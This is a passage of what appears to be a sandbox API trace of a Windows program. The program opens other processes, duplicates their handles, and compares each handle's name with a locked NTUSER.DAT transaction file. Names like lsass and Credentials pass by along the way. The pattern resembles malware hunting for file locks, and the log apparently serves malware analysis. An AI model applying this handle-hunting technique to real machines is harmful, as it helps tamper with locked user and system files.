dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.473] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.473] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.473] CloseHandle (hObject=0x670) returned 1 [0153.473] _wcsicmp (_Str1="\\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -62 [0153.473] CloseHandle (hObject=0x680) returned 1 [0153.474] CloseHandle (hObject=0x62c) returned 1 [0153.474] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.474] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.474] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.474] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.475] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.475] CloseHandle (hObject=0x670) returned 1 [0153.475] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.475] CloseHandle (hObject=0x680) returned 1 [0153.475] CloseHandle (hObject=0x62c) returned 1 [0153.475] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.475] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.476] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.476] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.477] CloseHandle (hObject=0x670) returned 1 [0153.477] CloseHandle (hObject=0x680) returned 1 [0153.477] CloseHandle (hObject=0x62c) returned 1 [0153.477] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.477] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.478] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.478] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.478] CloseHandle (hObject=0x670) returned 1 [0153.478] CloseHandle (hObject=0x680) returned 1 [0153.478] CloseHandle (hObject=0x62c) returned 1 [0153.478] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.478] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.479] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.480] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.480] CloseHandle (hObject=0x670) returned 1 [0153.480] _wcsicmp (_Str1="\\PASSWD.LOG", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.480] CloseHandle (hObject=0x680) returned 1 [0153.480] CloseHandle (hObject=0x62c) returned 1 [0153.480] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.480] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.480] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.481] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.481] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.481] CloseHandle (hObject=0x670) returned 1 [0153.481] CloseHandle (hObject=0x680) returned 1 [0153.481] CloseHandle (hObject=0x62c) returned 1 [0153.481] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.482] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x358, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.482] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.482] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.483] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.483] CloseHandle (hObject=0x670) returned 1 [0153.483] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.483] CloseHandle (hObject=0x680) returned 1 [0153.483] CloseHandle (hObject=0x62c) returned 1 [0153.483] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.483] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x360, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.484] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.484] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.484] CloseHandle (hObject=0x670) returned 1 [0153.484] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.484] CloseHandle (hObject=0x680) returned 1 [0153.485] CloseHandle (hObject=0x62c) returned 1 [0153.485] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.485] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.485] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.485] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.486] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.486] CloseHandle (hObject=0x670) returned 1 [0153.486] CloseHandle (hObject=0x680) returned 1 [0153.486] CloseHandle (hObject=0x62c) returned 1 [0153.486] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.486] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.486] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.487] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.488] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.488] CloseHandle (hObject=0x670) returned 1 [0153.488] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.488] CloseHandle (hObject=0x680) returned 1 [0153.488] CloseHandle (hObject=0x62c) returned 1 [0153.488] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.488] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.489] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.489] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.489] CloseHandle (hObject=0x670) returned 1 [0153.489] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.489] CloseHandle (hObject=0x680) returned 1 [0153.490] CloseHandle (hObject=0x62c) returned 1 [0153.490] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.490] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.490] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.491] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.491] CloseHandle (hObject=0x670) returned 1 [0153.491] _wcsicmp (_Str1="\\protected_storage", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 2 [0153.491] CloseHandle (hObject=0x680) returned 1 [0153.491] CloseHandle (hObject=0x62c) returned 1 [0153.491] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.492] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x550, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.492] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.492] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.493] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.493] CloseHandle (hObject=0x670) returned 1 [0153.493] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.493] CloseHandle (hObject=0x680) returned 1 [0153.493] CloseHandle (hObject=0x62c) returned 1 [0153.493] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.493] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.493] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.494] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.495] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.495] CloseHandle (hObject=0x670) returned 1 [0153.495] _wcsicmp (_Str1="\\lsass", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.495] CloseHandle (hObject=0x680) returned 1 [0153.495] CloseHandle (hObject=0x62c) returned 1 [0153.495] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.495] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.495] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.496] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.497] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.497] CloseHandle (hObject=0x670) returned 1 [0153.497] CloseHandle (hObject=0x680) returned 1 [0153.497] CloseHandle (hObject=0x62c) returned 1 [0153.497] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.497] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.497] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.498] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.498] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.499] CloseHandle (hObject=0x670) returned 1 [0153.499] CloseHandle (hObject=0x680) returned 1 [0153.499] CloseHandle (hObject=0x62c) returned 1 [0153.499] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.499] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.500] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.500] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.500] CloseHandle (hObject=0x670) returned 1 [0153.500] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.500] CloseHandle (hObject=0x680) returned 1 [0153.500] CloseHandle (hObject=0x62c) returned 1 [0153.500] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.501] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.501] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.501] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.502] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.502] CloseHandle (hObject=0x670) returned 1 [0153.502] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.502] CloseHandle (hObject=0x680) returned 1 [0153.502] CloseHandle (hObject=0x62c) returned 1 [0153.502] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.502] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.503] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.504] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.504] CloseHandle (hObject=0x670) returned 1 [0153.504] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.504] CloseHandle (hObject=0x680) returned 1 [0153.504] CloseHandle (hObject=0x62c) returned 1 [0153.504] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.504] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.507] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.509] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.509] CloseHandle (hObject=0x670) returned 1 [0153.509] CloseHandle (hObject=0x680) returned 1 [0153.509] CloseHandle (hObject=0x62c) returned 1 [0153.509] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.509] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.510] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.510] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.510] CloseHandle (hObject=0x670) returned 1 [0153.510] CloseHandle (hObject=0x680) returned 1 [0153.510] CloseHandle (hObject=0x62c) returned 1 [0153.511] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.511] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.511] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.513] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.513] CloseHandle (hObject=0x670) returned 1 [0153.513] CloseHandle (hObject=0x680) returned 1 [0153.513] CloseHandle (hObject=0x62c) returned 1 [0153.513] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x62c [0153.513] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.513] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.514] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.514] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.514] CloseHandle (hObject=0x670) returned 1 [0153.514] CloseHandle (hObject=0x680) returned 1 [0153.514] CloseHandle (hObject=0x62c) returned 1 [0153.514] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.515] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.515] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.516] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.516] CloseHandle (hObject=0x670) returned 1 [0153.516] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.516] CloseHandle (hObject=0x680) returned 1 [0153.516] CloseHandle (hObject=0x62c) returned 1 [0153.516] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.516] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.517] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.517] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.518] CloseHandle (hObject=0x670) returned 1 [0153.518] CloseHandle (hObject=0x680) returned 1 [0153.518] CloseHandle (hObject=0x62c) returned 1 [0153.518] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.518] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.519] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.519] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.519] CloseHandle (hObject=0x670) returned 1 [0153.520] CloseHandle (hObject=0x680) returned 1 [0153.520] CloseHandle (hObject=0x62c) returned 1 [0153.520] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.520] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.520] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.521] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.521] CloseHandle (hObject=0x670) returned 1 [0153.521] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.521] CloseHandle (hObject=0x680) returned 1 [0153.521] CloseHandle (hObject=0x62c) returned 1 [0153.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x62c [0153.521] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.521] CreateThread (in: lpThreadAttributes=0x0, 